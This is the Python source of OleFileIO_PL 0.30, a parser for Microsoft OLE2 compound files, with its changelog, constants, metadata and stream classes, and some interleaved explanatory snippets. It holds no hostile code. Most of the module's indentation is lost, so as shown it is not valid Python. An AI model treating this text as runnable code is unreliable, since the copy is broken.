#!/usr/local/bin/python
# -*- coding: latin-1 -*-
"""
OleFileIO_PL:
Module to read Microsoft OLE2 files (also called Structured Storage or
Microsoft Compound Document File Format), such as Microsoft Office
documents, Image Composer and FlashPix files, Outlook messages, ...
This version is compatible with Python 2.6+ and 3.x
version 0.30 2014-02-04 Philippe Lagadec - http://www.decalage.info
Project website: http://www.decalage.info/python/olefileio
Improved version of the OleFileIO module from PIL library v1.1.6
See: http://www.pythonware.com/products/pil/index.htm
The Python Imaging Library (PIL) is
Copyright (c) 1997-2005 by Secret Labs AB
Copyright (c) 1995-2005 by Fredrik Lundh
OleFileIO_PL changes are Copyright (c) 2005-2014 by Philippe Lagadec
See source code and LICENSE.txt for information on usage and redistribution.
WARNING: THIS IS (STILL) WORK IN PROGRESS.
"""
# Starting with OleFileIO_PL v0.30, only Python 2.6+ and 3.x are supported
# This import enables print() as a function rather than a keyword
# (main requirement to be compatible with Python 3.x)
# The comment on the line below should be printed on Python 2.5 or older:
from __future__ import print_function # This version of OleFileIO_PL requires Python 2.6+ or 3.x.
__author__ = "Philippe Lagadec, Fredrik Lundh (Secret Labs AB)"
__date__ = "2014-02-04"
__version__ = '0.30'
#--- LICENSE ------------------------------------------------------------------
# OleFileIO_PL is an improved version of the OleFileIO module from the
# Python Imaging Library (PIL).
# OleFileIO_PL changes are Copyright (c) 2005-2014 by Philippe Lagadec
#
# The Python Imaging Library (PIL) is
# Copyright (c) 1997-2005 by Secret Labs AB
# Copyright (c) 1995-2005 by Fredrik Lundh
#
# By obtaining, using, and/or copying this software and/or its associated
# documentation, you agree that you have read, understood, and will comply with
# the following terms and conditions:
#
# Permission to use, copy, modify, and distribute this software and its
# associated documentation for any purpose and without fee is hereby granted,
# provided that the above copyright notice appears in all copies, and that both
# that copyright notice and this permission notice appear in supporting
# documentation, and that the name of Secret Labs AB or the author(s) not be used
# in advertising or publicity pertaining to distribution of the software
# without specific, written prior permission.
#
# SECRET LABS AB AND THE AUTHORS DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS
# SOFTWARE, INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS.
# IN NO EVENT SHALL SECRET LABS AB OR THE AUTHORS BE LIABLE FOR ANY SPECIAL,
# INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM
# LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR
# OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR
# PERFORMANCE OF THIS SOFTWARE.
#-----------------------------------------------------------------------------
# CHANGELOG: (only OleFileIO_PL changes compared to PIL 1.1.6)
# 2005-05-11 v0.10 PL: - a few fixes for Python 2.4 compatibility
# (all changes flagged with [PL])
# 2006-02-22 v0.11 PL: - a few fixes for some Office 2003 documents which raise
# exceptions in _OleStream.__init__()
# 2006-06-09 v0.12 PL: - fixes for files above 6.8MB (DIFAT in loadfat)
# - added some constants
# - added header values checks
# - added some docstrings
# - getsect: bugfix in case sectors >512 bytes
# - getsect: added conformity checks
# - DEBUG_MODE constant to activate debug display
# 2007-09-04 v0.13 PL: - improved/translated (lots of) comments
# - updated license
# - converted tabs to 4 spaces
# 2007-11-19 v0.14 PL: - added OleFileIO._raise_defect() to adapt sensitivity
# - improved _unicode() to use Python 2.x unicode support
# - fixed bug in _OleDirectoryEntry
# 2007-11-25 v0.15 PL: - added safety checks to detect FAT loops
# - fixed _OleStream which didn't check stream size
# - added/improved many docstrings and comments
# - moved helper functions _unicode and _clsid out of
# OleFileIO class
# - improved OleFileIO._find() to add Unix path syntax
# - OleFileIO._find() is now case-insensitive
# - added get_type() and get_rootentry_name()
# - rewritten loaddirectory and _OleDirectoryEntry
# 2007-11-27 v0.16 PL: - added _OleDirectoryEntry.kids_dict
# - added detection of duplicate filenames in storages
# - added detection of duplicate references to streams
# - added get_size() and exists() to _OleDirectoryEntry
# - added isOleFile to check header before parsing
# - added __all__ list to control public keywords in pydoc
# 2007-12-04 v0.17 PL: - added _load_direntry to fix a bug in loaddirectory
# - improved _unicode(), added workarounds for Python <2.3
# - added set_debug_mode and -d option to set debug mode
# - fixed bugs in OleFileIO.open and _OleDirectoryEntry
# - added safety check in main for large or binary
# properties
# - allow size>0 for storages for some implementations
# 2007-12-05 v0.18 PL: - fixed several bugs in handling of FAT, MiniFAT and
# streams
# - added option '-c' in main to check all streams
# 2009-12-10 v0.19 PL: - bugfix for 32 bit arrays on 64 bits platforms
# (thanks to Ben G. and Martijn for reporting the bug)
# 2009-12-11 v0.20 PL: - bugfix in OleFileIO.open when filename is not plain str
# 2010-01-22 v0.21 PL: - added support for big-endian CPUs such as PowerPC Macs
# 2012-02-16 v0.22 PL: - fixed bug in getproperties, patch by chuckleberryfinn
# (https://bitbucket.org/decalage/olefileio_pl/issue/7)
# - added close method to OleFileIO (fixed issue #2)
# 2012-07-25 v0.23 PL: - added support for file-like objects (patch by mete0r_kr)
# 2013-05-05 v0.24 PL: - getproperties: added conversion from filetime to python
# datetime
# - main: displays properties with date format
# - new class OleMetadata to parse standard properties
# - added get_metadata method
# 2013-05-07 v0.24 PL: - a few improvements in OleMetadata
# 2013-05-24 v0.25 PL: - getproperties: option to not convert some timestamps
# - OleMetaData: total_edit_time is now a number of seconds,
# not a timestamp
# - getproperties: added support for VT_BOOL, VT_INT, V_UINT
# - getproperties: filter out null chars from strings
# - getproperties: raise non-fatal defects instead of
# exceptions when properties cannot be parsed properly
# 2013-05-27 PL: - getproperties: improved exception handling
# - _raise_defect: added option to set exception type
# - all non-fatal issues are now recorded, and displayed
# when run as a script
# 2013-07-11 v0.26 PL: - added methods to get modification and creation times
# of a directory entry or a storage/stream
# - fixed parsing of direntry timestamps
# 2013-07-24 PL: - new options in listdir to list storages and/or streams
# 2014-02-04 v0.30 PL: - upgraded code to support Python 3.x by Martin Panter
# - several fixes for Python 2.6 (xrange, MAGIC)
# - reused i32 from Pillow's _binary
#-----------------------------------------------------------------------------
# TODO (for version 1.0):
# + isOleFile should accept file-like objects like open
# + fix how all the methods handle unicode str and/or bytes as arguments
# + add path attrib to _OleDirEntry, set it once and for all in init or
# append_kids (then listdir/_list can be simplified)
# - TESTS with Linux, MacOSX, Python 1.5.2, various files, PIL, ...
# - add underscore to each private method, to avoid their display in
# pydoc/epydoc documentation - Remove it for classes to be documented
# - replace all raised exceptions with _raise_defect (at least in OleFileIO)
# - merge code from _OleStream and OleFileIO.getsect to read sectors
# (maybe add a class for FAT and MiniFAT ?)
# - add method to check all streams (follow sectors chains without storing all
# stream in memory, and report anomalies)
# - use _OleDirectoryEntry.kids_dict to improve _find and _list ?
# - fix Unicode names handling (find some way to stay compatible with Py1.5.2)
# => if possible avoid converting names to Latin-1
# - review DIFAT code: fix handling of DIFSECT blocks in FAT (not stop)
# - rewrite OleFileIO.getproperties
# - improve docstrings to show more sample uses
# - see also original notes and FIXME below
# - remove all obsolete FIXMEs
# - OleMetadata: fix version attrib according to
# http://msdn.microsoft.com/en-us/library/dd945671%28v=office.12%29.aspx
# IDEAS:
# - in OleFileIO._open and _OleStream, use size=None instead of 0x7FFFFFFF for
# streams with unknown size
# - use arrays of int instead of long integers for FAT/MiniFAT, to improve
# performance and reduce memory usage ? (possible issue with values >2^31)
# - provide tests with unittest (may need write support to create samples)
# - move all debug code (and maybe dump methods) to a separate module, with
# a class which inherits OleFileIO ?
# - fix docstrings to follow epydoc format
# - add support for 4K sectors ?
# - add support for big endian byte order ?
# - create a simple OLE explorer with wxPython
# FUTURE EVOLUTIONS to add write support:
# 1) add ability to write a stream back on disk from BytesIO (same size, no
# change in FAT/MiniFAT).
# 2) rename a stream/storage if it doesn't change the RB tree
# 3) use rbtree module to update the red-black tree + any rename
# 4) remove a stream/storage: free sectors in FAT/MiniFAT
# 5) allocate new sectors in FAT/MiniFAT
# 6) create new storage/stream
#-----------------------------------------------------------------------------
#
# THIS IS WORK IN PROGRESS
#
# The Python Imaging Library
# $Id$
#
# stuff to deal with OLE2 Structured Storage files. this module is
# used by PIL to read Image Composer and FlashPix files, but can also
# be used to read other files of this type.
#
# History:
# 1997-01-20 fl Created
# 1997-01-22 fl Fixed 64-bit portability quirk
# 2003-09-09 fl Fixed typo in OleFileIO.loadfat (noted by Daniel Haertle)
# 2004-02-29 fl Changed long hex constants to signed integers
#
# Notes:
# FIXME: sort out sign problem (eliminate long hex constants)
# FIXME: change filename to use "a/b/c" instead of ["a", "b", "c"]
# FIXME: provide a glob mechanism function (using fnmatchcase)
#
# Literature:
#
# "FlashPix Format Specification, Appendix A", Kodak and Microsoft,
# September 1996.
#
# Quotes:
#
# "If this document and functionality of the Software conflict,
# the actual functionality of the Software represents the correct
# functionality" -- Microsoft, in the OLE format specification
#
# Copyright (c) Secret Labs AB 1997.
# Copyright (c) Fredrik Lundh 1997.
#
# See the README file for information on usage and redistribution.
#
#------------------------------------------------------------------------------
import io
import sys
import struct, array, os.path, datetime
#[PL] Define explicitly the public API to avoid private objects in pydoc:
__all__ = ['OleFileIO', 'isOleFile', 'MAGIC']
# For Python 3.x, need to redefine long as int:
if str is not bytes:
long = int
# Need to make sure we use xrange both on Python 2 and 3.x:
try:
# on Python 2 we need xrange:
iterrange = xrange
except NameError:
# no xrange, for Python 3 it was renamed as range:
iterrange = range
#[PL] workaround to fix an issue with array item size on 64 bits systems:
if array.array('L').itemsize == 4:
# on 32 bits platforms, long integers in an array are 32 bits:
UINT32 = 'L'
elif array.array('I').itemsize == 4:
# on 64 bits platforms, integers in an array are 32 bits:
UINT32 = 'I'
else:
raise ValueError('Need to fix a bug with 32 bit arrays, please contact author...')
#[PL] These workarounds were inspired from the Path module
# (see http://www.jorendorff.com/articles/python/path/)
#TODO: test with old Python versions
# Pre-2.3 workaround for basestring.
try:
basestring
except NameError:
try:
# is Unicode supported (Python >2.0 or >1.6 ?)
basestring = (str, unicode)
except NameError:
basestring = str
#[PL] Experimental setting: if True, OLE filenames will be kept in Unicode
# if False (default PIL behaviour), all filenames are converted to Latin-1.
KEEP_UNICODE_NAMES = False
#[PL] DEBUG display mode: False by default, use set_debug_mode() or "-d" on
# command line to change it.
DEBUG_MODE = False
def debug_print(msg):
print(msg)
def debug_pass(msg):
pass
debug = debug_pass
def set_debug_mode(debug_mode):
"""
Set debug mode on or off, to control display of debugging messages.
mode: True or False
"""
global DEBUG_MODE, debug
DEBUG_MODE = debug_mode
if debug_mode:
debug = debug_print
else:
debug = debug_pass
MAGIC = b'\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1'
#[PL]: added constants for Sector IDs (from AAF specifications)
MAXREGSECT = 0xFFFFFFFA  # maximum SECT
DIFSECT    = 0xFFFFFFFC  # (-4) denotes a DIFAT sector in a FAT
FATSECT    = 0xFFFFFFFD  # (-3) denotes a FAT sector in a FAT
ENDOFCHAIN = 0xFFFFFFFE  # (-2) end of a virtual stream chain
FREESECT   = 0xFFFFFFFF  # (-1) unallocated sector
#[PL]: added constants for Directory Entry IDs (from AAF specifications)
MAXREGSID  = 0xFFFFFFFA  # maximum directory entry ID
NOSTREAM   = 0xFFFFFFFF  # (-1) unallocated directory entry
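The negative numbers quoted in the comments above are simply the signed 32-bit reading of these unsigned constants. A quick sketch of the correspondence:

```python
import struct

# Special sector IDs, as defined in the module:
DIFSECT    = 0xFFFFFFFC
FATSECT    = 0xFFFFFFFD
ENDOFCHAIN = 0xFFFFFFFE
FREESECT   = 0xFFFFFFFF

def as_signed32(value):
    # Reinterpret an unsigned 32-bit value as a signed one:
    return struct.unpack('<i', struct.pack('<I', value))[0]

print(as_signed32(DIFSECT))     # -4
print(as_signed32(ENDOFCHAIN))  # -2
print(as_signed32(FREESECT))    # -1
```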
#[PL] object types in storage (from AAF specifications)
STGTY_EMPTY = 0 # empty directory entry (according to OpenOffice.org doc)
STGTY_STORAGE = 1 # element is a storage object
STGTY_STREAM = 2 # element is a stream object
STGTY_LOCKBYTES = 3 # element is an ILockBytes object
STGTY_PROPERTY = 4 # element is an IPropertyStorage object
STGTY_ROOT = 5 # element is a root storage
#
# --------------------------------------------------------------------
# property types
VT_EMPTY=0; VT_NULL=1; VT_I2=2; VT_I4=3; VT_R4=4; VT_R8=5; VT_CY=6;
VT_DATE=7; VT_BSTR=8; VT_DISPATCH=9; VT_ERROR=10; VT_BOOL=11;
VT_VARIANT=12; VT_UNKNOWN=13; VT_DECIMAL=14; VT_I1=16; VT_UI1=17;
VT_UI2=18; VT_UI4=19; VT_I8=20; VT_UI8=21; VT_INT=22; VT_UINT=23;
VT_VOID=24; VT_HRESULT=25; VT_PTR=26; VT_SAFEARRAY=27; VT_CARRAY=28;
VT_USERDEFINED=29; VT_LPSTR=30; VT_LPWSTR=31; VT_FILETIME=64;
VT_BLOB=65; VT_STREAM=66; VT_STORAGE=67; VT_STREAMED_OBJECT=68;
VT_STORED_OBJECT=69; VT_BLOB_OBJECT=70; VT_CF=71; VT_CLSID=72;
VT_VECTOR=0x1000;
# map property id to name (for debugging purposes)
VT = {}
for keyword, var in list(vars().items()):
if keyword[:3] == "VT_":
VT[var] = keyword
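The loop above scans the module namespace and builds VT as a reverse map from numeric property type to constant name. The same idiom, sketched on an explicit subset of the constants (an explicit dict stands in for the vars() scan):

```python
# Reverse-mapping idiom used for the VT dictionary, on a subset of constants:
constants = {'VT_EMPTY': 0, 'VT_LPSTR': 30, 'VT_FILETIME': 64, 'OTHER': 99}

VT = {}
for keyword, var in constants.items():
    # only names starting with "VT_" are kept:
    if keyword[:3] == "VT_":
        VT[var] = keyword

print(VT[64])  # VT_FILETIME
print(VT[30])  # VT_LPSTR
```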
#
# --------------------------------------------------------------------
# Some common document types (root.clsid fields)
WORD_CLSID = "00020900-0000-0000-C000-000000000046"
#TODO: check Excel, PPT, ...
#[PL]: Defect levels to classify parsing errors - see OleFileIO._raise_defect()
DEFECT_UNSURE = 10 # a case which looks weird, but not sure it's a defect
DEFECT_POTENTIAL = 20 # a potential defect
DEFECT_INCORRECT = 30 # an error according to specifications, but parsing
# can go on
DEFECT_FATAL = 40 # an error which cannot be ignored, parsing is
# impossible
#[PL] add useful constants to __all__:
for key in list(vars().keys()):
if key.startswith('STGTY_') or key.startswith('DEFECT_'):
__all__.append(key)
#--- FUNCTIONS ----------------------------------------------------------------
def isOleFile (filename):
    """
    Test if a file is an OLE container (according to its header).
    filename: file name or path (str, unicode)
    return: True if OLE, False otherwise.
    """
    with open(filename, 'rb') as f:
        header = f.read(len(MAGIC))
    return header == MAGIC
if bytes is str:
# version for Python 2.x
def i8(c):
return ord(c)
else:
# version for Python 3.x
def i8(c):
return c if c.__class__ is int else c[0]
#TODO: replace i16 and i32 with more readable struct.unpack equivalent?
def i16(c, o = 0):
"""
    Converts a 2-byte (16-bit) string to an integer.
c: string containing bytes to convert
o: offset of bytes to convert in string
"""
return i8(c[o]) | (i8(c[o+1])<<8)
def i32(c, o = 0):
"""
    Converts a 4-byte (32-bit) string to an integer.
c: string containing bytes to convert
o: offset of bytes to convert in string
"""
## return int(ord(c[o])+(ord(c[o+1])<<8)+(ord(c[o+2])<<16)+(ord(c[o+3])<<24))
## # [PL]: added int() because "<<" gives long int since Python 2.4
# copied from Pillow's _binary:
return i8(c[o]) | (i8(c[o+1])<<8) | (i8(c[o+2])<<16) | (i8(c[o+3])<<24)
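As the TODO above suggests, these helpers are equivalent to little-endian struct.unpack calls. A quick check of the correspondence (Python 3 bytes indexing used here, so i8 is not needed):

```python
import struct

def i16(c, o=0):
    # little-endian 16-bit read, same as struct '<H':
    return c[o] | (c[o+1] << 8)

def i32(c, o=0):
    # little-endian 32-bit read, same as struct '<I':
    return c[o] | (c[o+1] << 8) | (c[o+2] << 16) | (c[o+3] << 24)

data = b'\x78\x56\x34\x12'
assert i16(data) == struct.unpack('<H', data[:2])[0] == 0x5678
assert i32(data) == struct.unpack('<I', data)[0] == 0x12345678
print('ok')
```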
def _clsid(clsid):
"""
Converts a CLSID to a human-readable string.
clsid: string of length 16.
"""
assert len(clsid) == 16
# if clsid is only made of null bytes, return an empty string:
# (PL: why not simply return the string with zeroes?)
if not clsid.strip(b"\0"):
return ""
return (("%08X-%04X-%04X-%02X%02X-" + "%02X" * 6) %
((i32(clsid, 0), i16(clsid, 4), i16(clsid, 6)) +
tuple(map(i8, clsid[8:16]))))
# UNICODE support:
# (necessary to handle storages/streams names which use Unicode)
def _unicode(s, errors='replace'):
"""
Map unicode string to Latin 1. (Python with Unicode support)
s: UTF-16LE unicode string to convert to Latin-1
errors: 'replace', 'ignore' or 'strict'.
"""
    #TODO: test if OleFileIO works with Unicode strings, instead of
# converting to Latin-1.
try:
# First the string is converted to plain Unicode:
# (assuming it is encoded as UTF-16 little-endian)
u = s.decode('UTF-16LE', errors)
if bytes is not str or KEEP_UNICODE_NAMES:
return u
else:
# Second the unicode string is converted to Latin-1
return u.encode('latin_1', errors)
    except Exception:
# there was an error during Unicode to Latin-1 conversion:
raise IOError('incorrect Unicode name')
def filetime2datetime(filetime):
"""
convert FILETIME (64 bits int) to Python datetime.datetime
"""
# TODO: manage exception when microseconds is too large
# inspired from http://code.activestate.com/recipes/511425-filetime-to-datetime/
_FILETIME_null_date = datetime.datetime(1601, 1, 1, 0, 0, 0)
#debug('timedelta days=%d' % (filetime//(10*1000000*3600*24)))
return _FILETIME_null_date + datetime.timedelta(microseconds=filetime//10)
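A quick sanity check of the conversion: FILETIME counts 100-nanosecond ticks since 1601-01-01, so 864000000000 ticks are exactly one day.

```python
import datetime

def filetime2datetime(filetime):
    # FILETIME epoch is 1601-01-01; one tick is 100 ns, i.e. 1/10 microsecond:
    _FILETIME_null_date = datetime.datetime(1601, 1, 1, 0, 0, 0)
    return _FILETIME_null_date + datetime.timedelta(microseconds=filetime // 10)

print(filetime2datetime(0))             # 1601-01-01 00:00:00
print(filetime2datetime(864000000000))  # 1601-01-02 00:00:00
```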
#=== CLASSES ==================================================================
class OleMetadata:
"""
class to parse and store metadata from standard properties of OLE files.
Available attributes:
codepage, title, subject, author, keywords, comments, template,
last_saved_by, revision_number, total_edit_time, last_printed, create_time,
last_saved_time, num_pages, num_words, num_chars, thumbnail,
creating_application, security, codepage_doc, category, presentation_target,
bytes, lines, paragraphs, slides, notes, hidden_slides, mm_clips,
scale_crop, heading_pairs, titles_of_parts, manager, company, links_dirty,
chars_with_spaces, unused, shared_doc, link_base, hlinks, hlinks_changed,
version, dig_sig, content_type, content_status, language, doc_version
Note: an attribute is set to None when not present in the properties of the
OLE file.
References for SummaryInformation stream:
- http://msdn.microsoft.com/en-us/library/dd942545.aspx
- http://msdn.microsoft.com/en-us/library/dd925819%28v=office.12%29.aspx
- http://msdn.microsoft.com/en-us/library/windows/desktop/aa380376%28v=vs.85%29.aspx
- http://msdn.microsoft.com/en-us/library/aa372045.aspx
- http://sedna-soft.de/summary-information-stream/
- http://poi.apache.org/apidocs/org/apache/poi/hpsf/SummaryInformation.html
References for DocumentSummaryInformation stream:
- http://msdn.microsoft.com/en-us/library/dd945671%28v=office.12%29.aspx
- http://msdn.microsoft.com/en-us/library/windows/desktop/aa380374%28v=vs.85%29.aspx
- http://poi.apache.org/apidocs/org/apache/poi/hpsf/DocumentSummaryInformation.html
new in version 0.25
"""
# attribute names for SummaryInformation stream properties:
# (ordered by property id, starting at 1)
SUMMARY_ATTRIBS = ['codepage', 'title', 'subject', 'author', 'keywords', 'comments',
'template', 'last_saved_by', 'revision_number', 'total_edit_time',
'last_printed', 'create_time', 'last_saved_time', 'num_pages',
'num_words', 'num_chars', 'thumbnail', 'creating_application',
'security']
# attribute names for DocumentSummaryInformation stream properties:
# (ordered by property id, starting at 1)
DOCSUM_ATTRIBS = ['codepage_doc', 'category', 'presentation_target', 'bytes', 'lines', 'paragraphs',
'slides', 'notes', 'hidden_slides', 'mm_clips',
'scale_crop', 'heading_pairs', 'titles_of_parts', 'manager',
'company', 'links_dirty', 'chars_with_spaces', 'unused', 'shared_doc',
'link_base', 'hlinks', 'hlinks_changed', 'version', 'dig_sig',
'content_type', 'content_status', 'language', 'doc_version']
def __init__(self):
"""
Constructor for OleMetadata
All attributes are set to None by default
"""
# properties from SummaryInformation stream
self.codepage = None
self.title = None
self.subject = None
self.author = None
self.keywords = None
self.comments = None
self.template = None
self.last_saved_by = None
self.revision_number = None
self.total_edit_time = None
self.last_printed = None
self.create_time = None
self.last_saved_time = None
self.num_pages = None
self.num_words = None
self.num_chars = None
self.thumbnail = None
self.creating_application = None
self.security = None
# properties from DocumentSummaryInformation stream
self.codepage_doc = None
self.category = None
self.presentation_target = None
self.bytes = None
self.lines = None
self.paragraphs = None
self.slides = None
self.notes = None
self.hidden_slides = None
self.mm_clips = None
self.scale_crop = None
self.heading_pairs = None
self.titles_of_parts = None
self.manager = None
self.company = None
self.links_dirty = None
self.chars_with_spaces = None
self.unused = None
self.shared_doc = None
self.link_base = None
self.hlinks = None
self.hlinks_changed = None
self.version = None
self.dig_sig = None
self.content_type = None
self.content_status = None
self.language = None
self.doc_version = None
def parse_properties(self, olefile):
"""
Parse standard properties of an OLE file, from the streams
"\x05SummaryInformation" and "\x05DocumentSummaryInformation",
if present.
Properties are converted to strings, integers or python datetime objects.
If a property is not present, its value is set to None.
"""
# first set all attributes to None:
for attrib in (self.SUMMARY_ATTRIBS + self.DOCSUM_ATTRIBS):
setattr(self, attrib, None)
if olefile.exists("\x05SummaryInformation"):
# get properties from the stream:
# (converting timestamps to python datetime, except total_edit_time,
# which is property #10)
props = olefile.getproperties("\x05SummaryInformation",
convert_time=True, no_conversion=[10])
# store them into this object's attributes:
for i in range(len(self.SUMMARY_ATTRIBS)):
# ids for standard properties start at 0x01, up to 0x13
value = props.get(i+1, None)
setattr(self, self.SUMMARY_ATTRIBS[i], value)
if olefile.exists("\x05DocumentSummaryInformation"):
# get properties from the stream:
props = olefile.getproperties("\x05DocumentSummaryInformation",
convert_time=True)
# store them into this object's attributes:
for i in range(len(self.DOCSUM_ATTRIBS)):
# ids for standard properties start at 0x01, up to 0x1C
value = props.get(i+1, None)
setattr(self, self.DOCSUM_ATTRIBS[i], value)
def dump(self):
"""
Dump all metadata, for debugging purposes.
"""
print('Properties from SummaryInformation stream:')
for prop in self.SUMMARY_ATTRIBS:
value = getattr(self, prop)
print('- %s: %s' % (prop, repr(value)))
print('Properties from DocumentSummaryInformation stream:')
for prop in self.DOCSUM_ATTRIBS:
value = getattr(self, prop)
print('- %s: %s' % (prop, repr(value)))
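A sketch of how parse_properties maps property ids to attribute names: ids start at 1, the attribute lists at index 0, so property id i+1 lands on attribute i. The stub olefile object and its property values below are hypothetical, standing in for a real OleFileIO instance:

```python
class OleMetadataSketch:
    # Reduced copy of the attribute table, for illustration only:
    SUMMARY_ATTRIBS = ['codepage', 'title', 'subject', 'author']

    def parse_properties(self, olefile):
        # first set all attributes to None:
        for attrib in self.SUMMARY_ATTRIBS:
            setattr(self, attrib, None)
        if olefile.exists("\x05SummaryInformation"):
            props = olefile.getproperties("\x05SummaryInformation")
            # property ids start at 1, the attribute list at index 0:
            for i in range(len(self.SUMMARY_ATTRIBS)):
                setattr(self, self.SUMMARY_ATTRIBS[i], props.get(i + 1, None))

class FakeOle:
    # Hypothetical stand-in exposing the two methods parse_properties needs:
    def exists(self, name):
        return name == "\x05SummaryInformation"
    def getproperties(self, name, **kwargs):
        return {2: 'Example title', 4: 'Example author'}

meta = OleMetadataSketch()
meta.parse_properties(FakeOle())
print(meta.title, meta.author)  # Example title Example author
```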
#--- _OleStream ---------------------------------------------------------------
class _OleStream(io.BytesIO):
"""
OLE2 Stream
Returns a read-only file object which can be used to read
    the contents of an OLE stream (instance of the BytesIO class).
To open a stream, use the openstream method in the OleFile class.
This function can be used with either ordinary streams,
or ministreams, depending on the offset, sectorsize, and
fat table arguments.
Attributes:
- size: actual size of data stream, after it was opened.
"""
# FIXME: should store the list of sects obtained by following
# the fat chain, and load new sectors on demand instead of
# loading it all in one go.
def __init__(self, fp, sect, size, offset, sectorsize, fat, filesize):
"""
Constructor for _OleStream class.
fp : file object, the OLE container or the MiniFAT stream
sect : sector index of first sector in the stream
size : total size of the stream
offset : offset in bytes for the first FAT or MiniFAT sector
sectorsize: size of one sector
fat : array/list of sector indexes (FAT or MiniFAT)
filesize : size of OLE file (for debugging)
return : a BytesIO instance containing the OLE stream
"""
debug('_OleStream.__init__:')
debug(' sect=%d (%X), size=%d, offset=%d, sectorsize=%d, len(fat)=%d, fp=%s'
%(sect,sect,size,offset,sectorsize,len(fat), repr(fp)))
#[PL] To detect malformed documents with FAT loops, we compute the
# expected number of sectors in the stream:
unknown_size = False
if size==0x7FFFFFFF:
# this is the case when called from OleFileIO._open(), and stream
# size is not known in advance (for example when reading the
# Directory stream). Then we can only guess maximum size:
size = len(fat)*sectorsize
# and we keep a record that size was unknown:
unknown_size = True
debug(' stream with UNKNOWN SIZE')
nb_sectors = (size + (sectorsize-1)) // sectorsize
debug('nb_sectors = %d' % nb_sectors)
# This number should (at least) be less than the total number of
# sectors in the given FAT:
if nb_sectors > len(fat):
raise IOError('malformed OLE document, stream too large')
# optimization(?): data is first a list of strings, and join() is called
# at the end to concatenate all in one string.
# (this may not be really useful with recent Python versions)
data = []
# if size is zero, then first sector index should be ENDOFCHAIN:
if size == 0 and sect != ENDOFCHAIN:
debug('size == 0 and sect != ENDOFCHAIN:')
raise IOError('incorrect OLE sector index for empty stream')
#[PL] A fixed-length for loop is used instead of an undefined while
# loop to avoid DoS attacks:
for i in range(nb_sectors):
# Sector index may be ENDOFCHAIN, but only if size was unknown
if sect == ENDOFCHAIN:
if unknown_size:
break
else:
# else this means that the stream is smaller than declared:
debug('sect=ENDOFCHAIN before expected size')
raise IOError('incomplete OLE stream')
# sector index should be within FAT:
if sect<0 or sect>=len(fat):
debug('sect=%d (%X) / len(fat)=%d' % (sect, sect, len(fat)))
debug('i=%d / nb_sectors=%d' %(i, nb_sectors))
## tmp_data = b"".join(data)
## f = open('test_debug.bin', 'wb')
## f.write(tmp_data)
## f.close()
## debug('data read so far: %d bytes' % len(tmp_data))
raise IOError('incorrect OLE FAT, sector index out of range')
#TODO: merge this code with OleFileIO.getsect() ?
#TODO: check if this works with 4K sectors:
try:
fp.seek(offset + sectorsize * sect)
            except Exception:
debug('sect=%d, seek=%d, filesize=%d' %
(sect, offset+sectorsize*sect, filesize))
raise IOError('OLE sector index out of range')
sector_data = fp.read(sectorsize)
# [PL] check if there was enough data:
# Note: if sector is the last of the file, sometimes it is not a
# complete sector (of 512 or 4K), so we may read less than
# sectorsize.
if len(sector_data)!=sectorsize and sect!=(len(fat)-1):
debug('sect=%d / len(fat)=%d, seek=%d / filesize=%d, len read=%d' %
(sect, len(fat), offset+sectorsize*sect, filesize, len(sector_data)))
debug('seek+len(read)=%d' % (offset+sectorsize*sect+len(sector_data)))
raise IOError('incomplete OLE sector')
data.append(sector_data)
# jump to next sector in the FAT:
try:
sect = fat[sect]
except IndexError:
# [PL] if pointer is out of the FAT an exception is raised
raise IOError('incorrect OLE FAT, sector index out of range')
#[PL] Last sector should be a "end of chain" marker:
if sect != ENDOFCHAIN:
raise IOError('incorrect last sector index in OLE stream')
data = b"".join(data)
# Data is truncated to the actual stream size:
if len(data) >= size:
data = data[:size]
# actual stream size is stored for future use:
self.size = size
elif unknown_size:
# actual stream size was not known, now we know the size of read
# data:
self.size = len(data)
else:
# read data is less than expected:
debug('len(data)=%d, size=%d' % (len(data), size))
raise IOError('OLE stream size is less than declared')
# when all data is read in memory, BytesIO constructor is called
io.BytesIO.__init__(self, data)
# Then the _OleStream object can be used as a read-only file object.
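The sector-chain walk performed above can be illustrated with a toy FAT (all values hypothetical): each FAT entry holds the index of the next sector in the stream, and ENDOFCHAIN terminates the chain. The bounded for-loop mirrors the anti-DoS approach used in _OleStream.__init__:

```python
ENDOFCHAIN = 0xFFFFFFFE

def follow_chain(fat, first_sect, max_sectors):
    # Walk the FAT chain with a fixed-length loop to detect FAT loops:
    chain = []
    sect = first_sect
    for _ in range(max_sectors):
        if sect == ENDOFCHAIN:
            break
        if sect < 0 or sect >= len(fat):
            raise IOError('incorrect OLE FAT, sector index out of range')
        chain.append(sect)
        sect = fat[sect]
    else:
        raise IOError('sector chain longer than expected (possible FAT loop)')
    return chain

# Toy FAT: the stream starts at sector 1, continues at 3, then 2, then ends:
fat = [ENDOFCHAIN, 3, ENDOFCHAIN, 2]
print(follow_chain(fat, 1, len(fat)))  # [1, 3, 2]
```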
#--- _OleDirectoryEntry -------------------------------------------------------
class _OleDirectoryEntry:
"""
OLE2 Directory Entry
"""
#[PL] parsing code moved from OleFileIO.loaddirectory
# struct to parse directory entries:
# <: little-endian byte order, standard sizes
# (note: this should guarantee that Q returns a 64 bits int)
# 64s: string containing entry name in unicode (max 31 chars) + null char
# H: uint16, number of bytes used in name buffer, including null = (len+1)*2
# B: uint8, dir entry type (between 0 and 5)
# B: uint8, color: 0=black, 1=red
# I: uint32, index of left child node in the red-black tree, NOSTREAM if none
# I: uint32, index of right child node in the red-black tree, NOSTREAM if none
# I: uint32, index of child root node if it is a storage, else NOSTREAM
# 16s: CLSID, unique identifier (only used if it is a storage)
# I: uint32, user flags
# Q (was 8s): uint64, creation timestamp or zero
# Q (was 8s): uint64, modification timestamp or zero
# I: uint32, SID of first sector if stream or ministream, SID of 1st sector
# of stream containing ministreams if root entry, 0 otherwise
# I: uint32, total stream size in bytes if stream (low 32 bits), 0 otherwise
# I: uint32, total stream size in bytes if stream (high 32 bits), 0 otherwise
STRUCT_DIRENTRY = '<64sHBBIII16sIQQIII'
# size of a directory entry: 128 bytes
DIRENTRY_SIZE = 128
assert struct.calcsize(STRUCT_DIRENTRY) == DIRENTRY_SIZE
